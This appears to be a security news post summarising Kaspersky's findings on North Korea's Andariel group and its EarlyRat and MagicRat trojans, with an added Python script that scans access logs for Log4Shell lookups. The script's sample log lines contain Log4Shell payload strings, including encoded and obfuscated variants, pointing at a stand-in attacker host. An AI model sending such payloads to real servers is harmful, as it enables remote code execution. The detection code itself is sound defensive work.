EarlyRat Malware Family
admin, 9 months ago, #news

EarlyRat: Hidden Malware Family of North Korean Hackers Exposed

Kaspersky Lab researchers have uncovered a previously undocumented malware family and identified operational errors committed by Andariel, a subgroup of the North Korean Lazarus Group. In its report, Kaspersky Lab analyzed the tactics of the Andariel group and identified a new threat it named "EarlyRat".

The Andariel group is known for using DTrack malware and Maui ransomware. Andariel first gained attention in mid-2022. Using the Log4Shell vulnerability, Andariel delivered various families of malware to target devices, including YamaBot and MagicRat, as well as updated versions of NukeSped and DTrack.


An investigation by Kaspersky Lab showed that Andariel initiates the infection by executing a Log4Shell exploit that downloads additional malware from a command and control (C2) server.
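Because Log4Shell is the initial access vector described here, a defender's first check is whether the exposed application's access logs carry JNDI lookup strings. The following is an added example, not code from the Kaspersky report: it normalizes constructed, hypothetical log lines (percent-decoding, lowercasing and collapsing the `${lower:x}` / `${::-x}` wrappers attackers use to split up the word "jndi") and reports each line containing a lookup. The addresses and timestamps are made up, with 203.0.113.7 (a documentation range) standing in for an attacker-controlled host.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical, not from the Kaspersky report).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Jun/2022:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jun/2022:12:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Jun/2022:12:01:09 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.81"',
    '10.0.0.9 - - [10/Jun/2022:12:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7/c}"',
]

# Single-character wrapper lookups used to hide the literal string "jndi":
# ${lower:j} -> j, ${upper:J} -> j (after lowercasing), ${::-j} -> j.
WRAPPER = re.compile(r"\$\{(?:lower|upper):([a-z])\}|\$\{::-([a-z])\}")
# A normalized JNDI lookup: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):[^}]*\}")


def normalize(text: str) -> str:
    """URL-decode (repeatedly), lowercase and collapse wrapper lookups until stable."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    text = text.lower()
    prev = None
    while prev != text:
        prev, text = text, WRAPPER.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def scan_log_lines(lines):
    """Return one finding per line that carries a JNDI lookup string anywhere in it."""
    findings = []
    for line in lines:
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            findings.append({
                "source": line.split()[0],  # client address: first field of a combined log line
                "scheme": match.group(1),   # ldap, rmi, dns, ...: where the second stage would be fetched from
                "lookup": match.group(0),   # decoded lookup string, for the incident record
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOGS):
        print(finding)
```

The whole line is scanned, not just the request path, because the lookup can arrive in any header the application logs (the second sample line carries it in the User-Agent). A hit is a trigger for checking outbound connections from the host to the referenced address, not proof of compromise on its own.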


It is noteworthy that the researchers observed the execution of commands by a human operator and noted numerous errors and typos, suggesting that an inexperienced attacker was behind the operation.


The researchers also identified a new malware family called EarlyRat. Initially, it was assumed that EarlyRat samples were downloaded via Log4Shell, but further analysis showed that phishing documents were the main delivery mechanism for EarlyRat.


EarlyRat, like many other remote access trojans (RATs), collects system information upon activation and transmits it to the C2 server in a fixed pattern. The transmitted data includes a unique computer identifier (ID) and requests that are encrypted using cryptographic keys specified in the ID field.


In terms of functionality, EarlyRat is simple, mostly limited to executing commands. Interestingly, EarlyRat shares some similarities with the Lazarus MagicRat malware: both are built on a framework (Qt for MagicRat and PureBasic for EarlyRat), and both RATs have limited functionality.


MagicRAT was first seen on victim networks using VMware Horizon servers connected to the internet. According to the researchers, the Trojan was created using the Qt framework to make analysis more difficult and less likely to be detected by security systems.


To gain a foothold in the system, the Trojan creates scheduled tasks. The functionality of MagicRat is quite simple - the malware provides attackers with a remote shell that allows them to execute arbitrary commands and manipulate the victim's files.
